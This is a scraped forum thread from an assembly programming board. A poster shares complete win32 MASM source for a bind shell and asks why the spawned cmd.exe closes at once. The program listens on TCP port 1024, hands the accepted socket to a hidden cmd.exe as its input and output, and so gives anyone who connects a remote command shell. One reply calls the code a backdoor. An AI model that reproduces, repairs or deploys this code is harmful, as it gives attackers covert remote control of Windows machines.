| |

VerySource

 Forgot password?
 Register
Search
VerySource»Forum Development Asm [Discussion] How to realize the output of cmd in win ...
12
Return to list New
Author: fengjk2006

[Discussion] How to realize the output of cmd in win32 assembly

[Copy link]
ggppmm

0

Threads

1

Posts

2.00

Credits

Newbie

Rank: 1

Credits
2.00

 China
Post time: 2020-12-20 21:15:01
| Show all posts
Obviously, this type of code is used as a backdoor

The original poster seems to be doing bad things
Reply

Use magic Report

fengjk2006

1

Threads

6

Posts

6.00

Credits

Newbie

Rank: 1

Credits
6.00

 China
 Author| Post time: 2020-12-21 00:15:02
| Show all posts
"Just use pipe. MSDN has the complete source code."

If you use pipes, then the socket can only be a socket. Now I use WSASocket, in order to figure out the steering output of cmd...

Execute cmd after calling CreateProcess, and then assign the handle returned by accept() to hStdInput, hStdOutput, hStdError in the process additional information. In theory, this is the case, but cmd was executed when I wrote the code to compile, but it disappeared in a flash. I took a look at it with OD and found no errors after setting a single step. I hope to discuss it together. The complete code I wrote is as follows:

.386P
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
TCP_PORT equ 1024; constant definition
.data
szCommand db'cmd.exe',0
  .data?
hScoket SOCKET?
hScoketOther SOCKET?
szBuffer db MAX_PATH dup(?)
dwSize DWORD?
  .code
_ProcessMain proc
local @wsaData:WSADATA
local @hScoket:SOCKET
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
invoke WSAStartup, 0202H, addr @wsaData; initialize WSAStartup library
mov @stAddr.sin_family,AF_INET; Set IP format
invoke htons, TCP_PORT; set the port
mov @stAddr.sin_port,ax; save
mov @stAddr.sin_addr,INADDR_ANY; set the IP address
invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0; load socket
mov hScoket,eax; save the handle
invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in; bind
.if eax == SOCKET_ERROR
mov eax,FALSE
ret
.endif
invoke listen,hScoket,5; start listening, 5 connections are by default
invoke accept, hScoket, NULL, NULL; if there is a client connection, confirm immediately
.if eax != INVALID_SOCKET
mov hScoketOther,eax
.endif
invoke GetStartupInfo,addr stStartUp
mov ebx,hScoketOther
mov stStartUp.hStdInput, ebx; Assign values ​​to the structure members of STARTUPINFO to make cmd turn to output. This value is the handle returned by accept()
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\
  NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo; load the result and execute cmd
ret
_ProcessMain endp
start:
invoke _ProcessMain
invoke ExitProcess,NULL
end start
Reply

Use magic Report

12
Return to list New
Advanced Mode
B Color Image Link Quote Code Smiles
You have to log in before you can reply Login | Register

Points Rules

Contact us|Archive|Mobile|CopyRight © 2008-2023|verysource.com ( 京ICP备17048824号-1 )

Quick Reply To Top Return to the list